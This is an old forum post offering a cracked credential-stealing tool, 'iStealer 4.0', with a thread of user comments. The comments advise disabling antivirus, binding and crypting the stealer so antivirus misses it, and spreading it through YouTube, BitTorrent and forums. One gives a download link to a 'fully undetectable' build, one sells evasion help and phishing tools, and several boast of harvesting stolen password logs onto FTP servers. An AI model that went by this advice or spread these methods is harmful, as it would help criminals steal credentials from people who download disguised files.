22 May 2009

iStealer 4.0 CRACKED

To run it, run Loader.exe


  1. course it is, its a stealer u noob. Learn some shit before using stf bitchass.

  2. hey, i tried putting in the new loader as well, then i get the message "error creating process"...please sort this out for me..

    I am using Win XP SP3

  3. 1. Try adding path of iStealer to antivirus exceptions

    2. Try disabling antivirus

    3. Try downloading iStealer again here:

  4. thanks works 100%!!

    i have uploaded a server binded with file and using crypter on youtube and on bittorrent and i have received a lots of logs in only 10 miutes!!

    Now my ftp site has over 300 logs!!!! Fantastic!! Thanks!!

    Contact me for learn how to make server undetectable by antivirus or for buy rapidshare accounts or for application pisher all for low price!!


  5. well btw i try this lol... and i do the register and i go to try and i did place the ocx thing in system folder where your susposed to ran the register thing .bat and says its still not registered

  6. what is this for?

  7. http://rapidshare.com/files/273922569/iStealer_4.0.4_FUD.exe

    Theres a clean one, scan it with novirusthanks.org but click don't share or whatever before you do it so that this isn't publicly released.

    I take no credits for the contents of this file, I just know that it's got a fully undetectable binder coded into it.

  8. I downloaded it and i build a file ... i double clicked it myself to test if it works but my ftp site didnt gain a log helP?

  9. WOW IT WORKED !! NICE TY VERY MUCH YEAH i gain my log now special thanks to you!! great job :)

  10. np, just, theres a newer version iStealer 5. Its better, the passwords come to php file...

  11. can anyone give me some tips how i can populare the builded file that i gain many logs?

  12. yeah sry i am not good in english haha .. xD..i mean that ppl click on it so that i gain logs

  13. 0, you can spread it by torrents, forums...I use these 2

  14. okay thx i added u to msn

  15. this istealer is backdoored

  16. so how do i read the log??

  17. i have also uploaded it with yhe help of binders and all....totally undetectable....but how to check the logs?....i have an account @ drivehq.com...but i tried to check the logs by this method-ftp://myusername:mypassword@ftp.drivehq.com
    but it shows 6 folders-
    Name Size Date Modified
    My Documents/ 1/26/10 6:31:00 AM
    My Music/ 1/26/10 6:31:00 AM
    My Pictures/ 1/26/10 6:31:00 AM
    PublicFolder/ 1/26/10 6:31:00 AM
    wwwhome/ 1/26/10 6:31:00 AM
    drivehqshare/ 1/29/10 12:15:00 PM
    what to do...its urgent plz help me...wanna check logs quickly..thnx in advance[:P]

  18. hey never use a cracked tool!

  19. wer i can download it?

  20. suck my dick there are some backdoors

